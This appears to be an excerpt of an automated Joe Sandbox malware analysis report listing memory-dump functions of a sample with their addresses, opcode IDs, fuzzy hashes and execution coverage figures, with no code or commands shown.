                                                                                                                                          • Instruction ID: 1878cdc2035c746bb3698a023e93cfb0ef31764a615923221c0975389dd41f34
                                                                                                                                          • Opcode Fuzzy Hash: cd498afd4c46ceaab2ef53eb9941f4aa4e4456c133fff020a34b6dd8412a7fe3
                                                                                                                                          • Instruction Fuzzy Hash: 30313820E1D9DA4EF37A835C5470570BF51EB52300B1946FAC09B8F9A7E8BDBA81C341
                                                                                                                                          Function 00007FFD9BA8C1F0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6bb6512b5855b07a99c248258d69caa327c667620523d9cbfd26dde4e39e5469
                                                                                                                                          • Instruction ID: ab449c08b95b16d4049edc0b7848b796ed7822f0380303e189ffc29071f656a1
                                                                                                                                          • Opcode Fuzzy Hash: 6bb6512b5855b07a99c248258d69caa327c667620523d9cbfd26dde4e39e5469
                                                                                                                                          • Instruction Fuzzy Hash: 7E215B20A1D99F4AE729A39C44706F47F51EFA1311B1942B6C08ACF8E7F87C79C19740
                                                                                                                                          Function 00007FFD9BA88A42 Relevance: .1, Instructions: 85COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7d01201154f82fa71b24e5ebb281ef18ca6dea10254269ba6d72fb0cf037ab89
                                                                                                                                          • Instruction ID: cc6648315a6e0e37d63e8c12e38bfc9daf1f33e4c008e295befa8d93434ae6ce
                                                                                                                                          • Opcode Fuzzy Hash: 7d01201154f82fa71b24e5ebb281ef18ca6dea10254269ba6d72fb0cf037ab89
                                                                                                                                          • Instruction Fuzzy Hash: 2A31CB70E18A1DCFEB58EFA8D8A5AEDB7B1FF58300F500169D019E7296DE386841CB40
                                                                                                                                          Function 00007FFD9BA81B28 Relevance: .1, Instructions: 81COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 777a96a436c64570b3c957ab7c714dec2392945d57c7af985e78e9402ea698fd
                                                                                                                                          • Instruction ID: ddb6edc2505b8b155bff4e9b43d3b0c031350d7abdc78b66d3c657db588bc545
                                                                                                                                          • Opcode Fuzzy Hash: 777a96a436c64570b3c957ab7c714dec2392945d57c7af985e78e9402ea698fd
                                                                                                                                          • Instruction Fuzzy Hash: 28210420F1D86B4AF679939C64749F8B641EF60305F1542B6C05F8B9EBECBC7A819281
                                                                                                                                          Function 00007FFD9BA892EA Relevance: .1, Instructions: 79COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8ce7ea7febb81fbaa2f64292e8318d0a429c6597598e06cd29f58116a38039cf
                                                                                                                                          • Instruction ID: ae4706074fcd2e68477b197818ca22fbf1afb1522df5dcfa57d078276203f291
                                                                                                                                          • Opcode Fuzzy Hash: 8ce7ea7febb81fbaa2f64292e8318d0a429c6597598e06cd29f58116a38039cf
                                                                                                                                          • Instruction Fuzzy Hash: 0321B531A0FACA87E33653A658391B86A40EFC6214F1A11FED64D858F2DCEC26419343
                                                                                                                                          Function 00007FFD9BA83569 Relevance: .1, Instructions: 71COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0d500f99518b0287f0e500872fa3128b51aefb89cf0c5df47373df205436d981
                                                                                                                                          • Instruction ID: 3280819e3655b7c63de52b04ba92d5fb76f973b608d489ed6b3df0b6f7c83a63
                                                                                                                                          • Opcode Fuzzy Hash: 0d500f99518b0287f0e500872fa3128b51aefb89cf0c5df47373df205436d981
                                                                                                                                          • Instruction Fuzzy Hash: E9210971E0A90D9FDB9CDB58D466AADB7E1FF58300F0100BDE00ED76A1DE74A9518B00
                                                                                                                                          Function 00007FFD9BA83232 Relevance: .1, Instructions: 67COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: aa1ee1671cdd03435a37d46d961a07a9d659479a5045bdf93d904992027fea9f
                                                                                                                                          • Instruction ID: d6bcaafd0a5c9ff80ccd330b76397793aa3210807fa45cac82ff312da30bebca
                                                                                                                                          • Opcode Fuzzy Hash: aa1ee1671cdd03435a37d46d961a07a9d659479a5045bdf93d904992027fea9f
                                                                                                                                          • Instruction Fuzzy Hash: 61217731A0FACA4BF37653A458712B86E906F62210F1A01FAF48D4E8F3E9ED15459352
                                                                                                                                          Function 00007FFD9BA851F0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 814d8d2219ae688ab54ad8ae8de48a383e33c75908c9f935d27e121d82d57a6a
                                                                                                                                          • Instruction ID: 4b0eae7fc46bdc438b3f0fee4b49b5b7191ffbf58fa1512854c5ace032ab529d
                                                                                                                                          • Opcode Fuzzy Hash: 814d8d2219ae688ab54ad8ae8de48a383e33c75908c9f935d27e121d82d57a6a
                                                                                                                                          • Instruction Fuzzy Hash: 2711C431B09E4A4EDB68EB64D8219FA73E0EF64351B41057AD44EC79E2EE38B6058390
                                                                                                                                          Function 00007FFD9BA8B2A0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 73550f82dc986535e93715d886dadcde3f480d5ce31e0f8d4dbed33224af7b82
                                                                                                                                          • Instruction ID: df69eaf25ac9d9dd41b0f3c48fe036e196374bbbafede1dfd5b264012d485142
                                                                                                                                          • Opcode Fuzzy Hash: 73550f82dc986535e93715d886dadcde3f480d5ce31e0f8d4dbed33224af7b82
                                                                                                                                          • Instruction Fuzzy Hash: A411C430B09D4A4EE778EB64E8215FA7391EF54351B40067AD44AC78E7DE78A6428380
                                                                                                                                          Function 00007FFD9BA8506E Relevance: .1, Instructions: 61COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fa8bcfd2f6c836da6ef72954d0887966f8a22014c8492408eda89beef37ba00b
                                                                                                                                          • Instruction ID: 6208e354d3bec9868e35d9fe18567606cdbe63d290766e3ee2cd086824477c4d
                                                                                                                                          • Opcode Fuzzy Hash: fa8bcfd2f6c836da6ef72954d0887966f8a22014c8492408eda89beef37ba00b
                                                                                                                                          • Instruction Fuzzy Hash: 5E11483170990A4FE7199B58DC252F433A0EF64361F11013FDC09CBAE2DF79AA408780
                                                                                                                                          Function 00007FFD9BA8964F Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 47f6e769ee31db804fbd4f465a5652e697990d984dcdfd7ff9744b4950becc52
                                                                                                                                          • Instruction ID: 9032cb6d5ae04769d6704723008a44f4804386f47b64fc1b917d22ec6c240327
                                                                                                                                          • Opcode Fuzzy Hash: 47f6e769ee31db804fbd4f465a5652e697990d984dcdfd7ff9744b4950becc52
                                                                                                                                          • Instruction Fuzzy Hash: AF11F630A1981D8EDFACDB58D465AADB7A1EB98300F4101BAD10EE36A1CE7569408B40
                                                                                                                                          Function 00007FFD9BA8358E Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 79fecc7d0d95cc80f741f7c96a894e67d6605bb7435f58aa8368b20571ec5337
                                                                                                                                          • Instruction ID: 7f0f6005b63f06ce44501971961208e9040114c31ce28b59d3618f3a62f99b92
                                                                                                                                          • Opcode Fuzzy Hash: 79fecc7d0d95cc80f741f7c96a894e67d6605bb7435f58aa8368b20571ec5337
                                                                                                                                          • Instruction Fuzzy Hash: 18111970A1990D8FDF9CDB58D465AADB7E1FF68300F0001BEE40EE36A1DE75A9818B00
                                                                                                                                          Function 00007FFD9BA8B11E Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e15bf172ca969ee95c9b305ebc6d61c601e90b7e11eb13144ebd948d36f3d299
                                                                                                                                          • Instruction ID: 8abf8628400398ee247efd867a359413f0e7c52b855abdf55a7459fa0e32cd53
                                                                                                                                          • Opcode Fuzzy Hash: e15bf172ca969ee95c9b305ebc6d61c601e90b7e11eb13144ebd948d36f3d299
                                                                                                                                          • Instruction Fuzzy Hash: 57116B3170990A8FE7199F48D8252F93390EF55361F41013FD809CB9E2DF7AA6418340
                                                                                                                                          Function 00007FFD9BA81741 Relevance: .1, Instructions: 55COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9163c484ce258e296f7557fd41aa68f4bcf19667a86b1aa978420ba51cb2d155
                                                                                                                                          • Instruction ID: 8667871b54507c721f79e94f9396f07ab6c38b7898c81ecf926e0e83f291180a
                                                                                                                                          • Opcode Fuzzy Hash: 9163c484ce258e296f7557fd41aa68f4bcf19667a86b1aa978420ba51cb2d155
                                                                                                                                          • Instruction Fuzzy Hash: E8114F71F0FD5F86F67817D558311BD4480AF75320F2605B6F40E4A9E6FCED2A462292
                                                                                                                                          Function 00007FFD9BA8451F Relevance: .0, Instructions: 41COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8d590c0e214d61867bd7c0db3f68def42865470f3223f72d42b1f4e8745ed664
                                                                                                                                          • Instruction ID: faea41c6370f6f47e04145af6b22cc4528bfb34ed931da4497a7cb1c3c9512bf
                                                                                                                                          • Opcode Fuzzy Hash: 8d590c0e214d61867bd7c0db3f68def42865470f3223f72d42b1f4e8745ed664
                                                                                                                                          • Instruction Fuzzy Hash: 24F09032B08E5C4FD7A9965C84183BD32D2EB68301F02027FC44DE72A1CEA41E054382
                                                                                                                                          Function 00007FFD9BA83862 Relevance: .0, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 636bcf96a0994c3189b435ef7a7da97d7402a596a888140014f343e4eeb9dbde
                                                                                                                                          • Instruction ID: 99e1f6971d6dc18f7559bbb2a1f4c819ba57e79352071d8f68ccc94d1194c285
                                                                                                                                          • Opcode Fuzzy Hash: 636bcf96a0994c3189b435ef7a7da97d7402a596a888140014f343e4eeb9dbde
                                                                                                                                          • Instruction Fuzzy Hash: 09F0623144E6C99FD7228BB098655E57FE4EF42204B1A00F6E085874A2C9BD5616C762
                                                                                                                                          Function 00007FFD9BA8877E Relevance: .0, Instructions: 23COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4a9216690590684ed50b831a97eaef9e8b7e319adadfd141989c6971ef9d02f4
                                                                                                                                          • Instruction ID: 52a8353e16f0f81109fe7883906de8d7c1a0911a4458d4d8ff9034fae4ed5ca0
                                                                                                                                          • Opcode Fuzzy Hash: 4a9216690590684ed50b831a97eaef9e8b7e319adadfd141989c6971ef9d02f4
                                                                                                                                          • Instruction Fuzzy Hash: 0CD02B3A91590C07D7307B90E4104EAF774FF81364F010136D81CC7050EE7557168390
                                                                                                                                          Function 00007FFD9BA886AA Relevance: .0, Instructions: 22COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c94d5f055c506cee45fb6ad6607d61585c9b0e904e4b78a1647631d11fe7cc36
                                                                                                                                          • Instruction ID: 09637a116e9932c590755193bc9c58e2706a3b466ca7856a59b2aa8cd7fd4011
                                                                                                                                          • Opcode Fuzzy Hash: c94d5f055c506cee45fb6ad6607d61585c9b0e904e4b78a1647631d11fe7cc36
                                                                                                                                          • Instruction Fuzzy Hash: 10E0C23AAA9B0D09D7325BC0D0221F9F7A0EF81330F161072C85946461AE7523668A90
                                                                                                                                          Function 00007FFD9BA8871A Relevance: .0, Instructions: 17COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 360ddc278d726ec06f0462cf759673f6b355f6fd97927f00d9e04b571affc012
                                                                                                                                          • Instruction ID: 8b56ba6a6090afb8c4c1251877be2bd8dd8206055c02f7e74c265ee114a8758b
                                                                                                                                          • Opcode Fuzzy Hash: 360ddc278d726ec06f0462cf759673f6b355f6fd97927f00d9e04b571affc012
                                                                                                                                          • Instruction Fuzzy Hash: A6D0223AB4590D4CD3222BC9F1320F8B7A0CFC2230B0600B2D45D818B2DD7916964252
                                                                                                                                          Function 00007FFD9BA8504B Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5bd1db77b04f30a4c8b5927305d3e4094819d533fac6efa4eca5ca8f1e1cc3b0
                                                                                                                                          • Instruction ID: e008cda29c27b9cbd04395513d2f156e87f1076f6940849452a94c036f0c2a75
                                                                                                                                          • Opcode Fuzzy Hash: 5bd1db77b04f30a4c8b5927305d3e4094819d533fac6efa4eca5ca8f1e1cc3b0
                                                                                                                                          • Instruction Fuzzy Hash: 3BD09234B0FE4F99F5384781887023A11F09F14700E2A403DC86F49CE1ADB9BA016241
                                                                                                                                          Function 00007FFD9BA8B0FB Relevance: .0, Instructions: 11COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6d032f20c95148496df8d8c203ce889e0fa691dcbae9313a4793b221c2c2cb15
                                                                                                                                          • Instruction ID: bf6641d2e1aeae1d2be0af2df06cd943462c165625f42d4cb3bfb4a6ab0cb04e
                                                                                                                                          • Opcode Fuzzy Hash: 6d032f20c95148496df8d8c203ce889e0fa691dcbae9313a4793b221c2c2cb15
                                                                                                                                          • Instruction Fuzzy Hash: ACD09230B0ED5B85F27A4781807133A75948F00701FA2103AD0EF45CF1CDBA77016612
                                                                                                                                          Function 00007FFD9BA8456F Relevance: .0, Instructions: 8COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d98b77864822bfe81d983e39eb70625ec09fce1f152e467ddc440cbbd1ad2e3a
                                                                                                                                          • Instruction ID: f096ee676c230755284848262f945589ec667f34cf7b50c9d50608c5bca93873
                                                                                                                                          • Opcode Fuzzy Hash: d98b77864822bfe81d983e39eb70625ec09fce1f152e467ddc440cbbd1ad2e3a
                                                                                                                                          • Instruction Fuzzy Hash: E9C08C34F0E6074BE23003E4487013C16800F0A200B060976D2068A5F3DCE83A101290
                                                                                                                                          Function 00007FFD9BA8A631 Relevance: .0, Instructions: 6COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2a451a5e8d1f292437b827367f38daa51f1e44abce5ead2f788ecb7db4140a05
                                                                                                                                          • Instruction ID: 551dfe041fccdcd8ab75db8724594b2d1a48189b93a3b6a48db7e48a3bda59df
                                                                                                                                          • Opcode Fuzzy Hash: 2a451a5e8d1f292437b827367f38daa51f1e44abce5ead2f788ecb7db4140a05
                                                                                                                                          • Instruction Fuzzy Hash: 6EB01230F0FA0F43F13002F084B003D00400B04600E530930D51B469E3ECFC3B411260

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 00007FFD9BA80EFA Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 5/_^
                                                                                                                                          • API String ID: 0-1683024698
                                                                                                                                          • Opcode ID: 4f0e3e58f7b6211c41d21942b9dda32c0e7b262da7943eb685d384603c2c7a2a
                                                                                                                                          • Instruction ID: 865bbe8df0897d08cd5fa99473d74a033b34c163fe77c9ee0fa48bccc15b5b80
                                                                                                                                          • Opcode Fuzzy Hash: 4f0e3e58f7b6211c41d21942b9dda32c0e7b262da7943eb685d384603c2c7a2a
                                                                                                                                          • Instruction Fuzzy Hash: E45170B3A0F59A5BE7215B6C5CB70D23BA0EF1635870A11B7D098CF0A3E959791ED340
                                                                                                                                          Function 00007FFD9BA80CF2 Relevance: .4, Instructions: 426COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1f5e7a6d2f3b5735fe962bf02cf826236051053cf226abc73f66132e7799a232
                                                                                                                                          • Instruction ID: 8700295ae06ba9997507c3ce1155659126c74f8de84bf76f1fde7d4e6d702bf5
                                                                                                                                          • Opcode Fuzzy Hash: 1f5e7a6d2f3b5735fe962bf02cf826236051053cf226abc73f66132e7799a232
                                                                                                                                          • Instruction Fuzzy Hash: B8C10D63A0F5A65BD725AB6CBCB64D27FA0DF1222C70911F7E09C8F0E3E858754AD244
                                                                                                                                          Function 00007FFD9BA80DF2 Relevance: .3, Instructions: 322COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5a353440f000ef3dd8fc605f347ecc85687587aa071416ca108c388b699f25f2
                                                                                                                                          • Instruction ID: 2e20557af058d147774911c9dff8389abfc6f91fb21e79d1b608c51430c4bc8b
                                                                                                                                          • Opcode Fuzzy Hash: 5a353440f000ef3dd8fc605f347ecc85687587aa071416ca108c388b699f25f2
                                                                                                                                          • Instruction Fuzzy Hash: 14912F73E0F5A65BE725AB6C6CB64D27FA0DF1226C70901B7D09C8F0E3E858354E9244
                                                                                                                                          Function 00007FFD9B89DDAD Relevance: .3, Instructions: 251COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5d7ed8d7c6d6f1b28a0959d3438161f2fb976a10a4cbb56b961b6e272beddb42
                                                                                                                                          • Instruction ID: 36e8ac3cb07fa0ade680be6e7f512ba6802d65d799431caec76503e7f0ebd25f
                                                                                                                                          • Opcode Fuzzy Hash: 5d7ed8d7c6d6f1b28a0959d3438161f2fb976a10a4cbb56b961b6e272beddb42
                                                                                                                                          • Instruction Fuzzy Hash: 5E817030A08A8D8FDFA8DF18C856BE97BE1FF59311F10412AE84DC7292DB749945CB81

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:16%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:33
                                                                                                                                          Total number of Limit Nodes:3
